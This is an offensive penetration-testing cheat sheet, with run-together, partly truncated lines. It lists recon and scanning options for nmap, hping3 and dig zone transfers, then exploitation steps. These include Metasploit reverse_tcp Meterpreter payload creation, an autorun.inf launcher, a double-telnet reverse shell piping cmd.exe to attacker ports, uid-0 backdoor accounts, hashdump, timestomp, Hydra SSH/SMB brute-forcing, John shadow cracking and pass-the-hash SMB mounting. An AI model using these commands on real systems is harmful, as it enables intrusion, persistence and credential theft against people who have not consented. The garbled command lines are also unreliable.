whois
$ whois [-h whois_server] name
nslookup
$ nslookup
dig
-
Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server][type]
-
Zone transfer
$ dig [@server]-t AXFR
-
Iterative zone transfer
$ dig [@server]-t IXFR=
BiLE.pl
$ ./BiLE$ ./BiLE-weigh.pl $ ./tld-expand.pl$ ./vet-IPrange.pl$ ./qtrace.pl
snmpwalk
Dump the ARP table of an snmp server at HOST
$ snmpwalk -v 2c -cip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump
Scanning
tcpdump
Parameters
-
-n -- use numbers
-
-i <interface>
-
-v -- be verbose
-
-r <file>/-w <file> -- read from/write to file
-
-x -- print hex
-
-A -- print ASCII
-
-X -- print hex and ASCII
-
-s <snaplen> -- length to capture (-s0 for all data)
Filter string
-
Protocol
-
ether, ip, ip6, arp, rarp, tcp, udp
-
-
Type
-
host <host>
-
net <network>
-
port <portnum>
-
portrange <start-end>
-
-
Direction
-
src
-
dst
-
-
Logic
-
and
-
or
-
-
Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
-
Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
-
Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10
hping3
TCP Flags
-
--syn, --fin, --rst, --push, --ack, --urg
Target selection
-
--rand-dest
-
--interface <int>
Source selection
-
--spoof <hostname>
-
--rand-source
Port selection
-
--destport <port>
-
--destport +<port> -- increment by one for each packet received
-
--destport ++<port> -- increment by one for each packet sent
-
--scan <portrange>
-
--baseport <port>
-
--keep -- don't increment the source port
Speed options
-
--fast, --faster, --flood
-
--interval <N> -- interval in seconds
-
--interval u<N> -- interval in microseconds
Other options
-
--count <N>
-
--beep
-
--file <filename>
-
--data <N>
traceroute
Parameters
-
-f <N> -- Initial TTL
-
-g <hostlist> -- Loose source route
-
-I -- use ICMP Echo instead of UDP
-
-m <N> -- maximum number of hops (default 30)
-
-n -- numeric
-
-p <baseport> -- set the base UDP port
-
-w <N> -- wait N seconds (default 5)
Layer Four Traceroute (lft)
Options
-
-u -- use UDP
-
-p -- use ICMP echo
-
-d <port> -- destination port (default 80)
-
-s <port> -- source port
-
-L <N> -- length (including layer 3/4 header)
-
-A -- look up AS number
-
-P -- traceroute via tcp
nmap
Pinging
-
-PN -- don't ping
-
-PB -- default, ICMP Echo + TCP to port 80
-
-PE -- ICMP Echo request
-
-PS[portlist] -- TCP SYN
-
-PP -- ICMP Timestamp request
-
-PM -- ICMP Address Mask request
-
-PR -- default on subnet, use ARP to identify hosts
Scanning
-
-sT -- TCP Connect scan
-
-sS -- SYN scan
-
-sA -- ACK scan
-
-sF -- FIN scan
-
-sN -- Null scan
-
-sX -- Xmas Tree scan
-
-sM -- Maimon scan
-
--scanflags specify your own flags
-
-sU -- UDP scan
Fingerprinting
-
-O -- OS fingerprint
-
-sV -- Version scan
Scripts
-
-sC -- run all scripts
-
--script=<category,dir,src,etc&/gt;
-
--script-trace
Timing
-
--paranoid, --sneaky, --polite, --normal, --aggressive, --insane
-
--host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay
Other options
-
-p<ports>
-
-F -- fast (checks only ports in nmap-services)
-
--packet-trace
-
--traceroute
-
--badsum
THC amap
Options
-
-q -- quiet (omit closed ports)
-
-v -- verbose
-
-b -- print banners
Example:
amap -bqv 10.10.10.10 1-50
Enumerating users
Commands
$ cat /etc/passwd
$ finger
$ who
$ w
Remotely:
$ finger @
Exploitation
netcat
Options
-
-l -- listen mode
-
-L -- listen harder (Windows only)
-
-u -- UDP mode
-
-p -- local port (in listen mode, the port to listen on)
-
-e -- program to execute
-
-n -- don't resolve names
-
-z -- don't send any data
-
-w<N> -- timeout for connects
-
-v/-vv -- be verbose
Scanning
echo "" | nc -v -n -w1
Setting up a relay
mknod backpipe pnc -l -p< backpipe | nc > backpipe
Relaying port 22 to the local system
mknod backpipe pnc -l -p< backpipe | nc localhost 22 > backpipe
Finding SetUID/SetGID programs
find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -printfind /sbin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done
Metasploit
Running an exploit
msf> show exploitsmsf> use exploit/windows/smf/ms05_039_phpmsf> show payloadsmsf> set PAYLOAD windows/shell/bind_tcpmsf> show optionsmsf> set RHOST 10.10.10.10msf> exploit
Interacting with sessions
msf> sessions -lmsf> sessions -i
Creating a malicious VBScript
$ msfpayload windows/meterpreter/reverse_tcp LHOST=V$ msfpayload windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=y V
Creating a malicious Exe
$ msfpayload windows/meterpreter/reverse_tcp LHOST=X$ msfpayload windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=y X
Example autorun.inf file to run a malicious exe (goes with Metasploit)
[autorun]open=example.exeicon=example.exe
Metasploit listener
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=E$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=y E
Meterpreter
Filesystem commands
> cd> lcd > pwd / getwd> ls> cat> download / upload> mkdir / rmdir> edit> getpid> getuid> ps> kill> execute> migrate> ipconfig> portfwd> route> idletime> uictl
Modules
> use> use priv> hashdump> timestomp
Creating a user
Adding an ordinary user
useradd
Adding a root user (note: a non-uid-0 account may be required to log in)
useradd -o -u 0
telnet
Checking for inetd/xinetd
ps aux | grep inetd
Adding telnet to /etc/inetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
Adding telnet to xinetd
-
Steal the file from a service that's running (files are in /etc/xinetd.d)
-
Change server to "/usr/sbin/in.telnetd"
Restarting inetd/xinetd (the "kill" command with the PID can also be used)
killall -HUP inetdkillall -HUP xinetd
sshd
File should be in /etc/rc*. Ways to enable:
chkconfig sshd onservice sshd start/etc/init.d/sshd start
Passwords
Dictionaries
Creating a dictionary
cat wordlist.txt | sort | uniq > dictionary.txt
Scraping a Web site
mkdir /tmp/sourcecd /tmp/sourcewget -r -lcd ..grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst
Or, just use
Account lockout
grep tally /etc/pam.d/*grep tally /etc/pam.conf
pw-inspector
Options
-
-i -- input file
-
-o -- output file
-
-m <N> -- minimum length
-
-M <N> -- maximum length
-
-c <N> -- the number of criteria
-
-l -- lower case
-
-u -- upper case
-
-n -- numbers
-
-p -- printable characters (lower/upper/num)
-
-s -- special characters (all others)
-
Example
cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2
Hydra
Options
-
-l <username>/-L <userfile> -- Login name/file
-
-p <password>/-P <passfile> -- Password/file
-
-e <n|s|ns> -- extended checks (n = null, s = same as username)
-
-t <N> -- thread count
hydra<-l |-L > <-p |-P > [-e ] [-t ]
smb password
hydrasmb -l george -P ./list.lst -e ns
ssh password
hydrassh2 -l george -P ./list.lst -e ns
John
Show cracked passwords
john --show
Speed test
john --test
Running against a password file
john
Specifying type type
john --format=john --format=nt /tmp/pwdump
Combining passwd/shadow
unshadow> combined.txtjohn combined.txt
Modified Samba
Loading the hash
export SMBHASH=": "echo $SMBHASH
Mounting a drive
./smbmount /// -o username= ./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator
Adding a user
./net user ADD-I -U ./net rpc group ADDMEM administrators -I -U
Web
nikto.pl
Scanning
nikto.pl -h
Updating
nikto.pl -update
Single check
nikto.pl -Single
Fancy tricks
Double-telnet
On the attacker machine
nc -l -p 4444nc -l -p 5555
On the victim machine
telnet4444 | cmd.exe | telnet 5555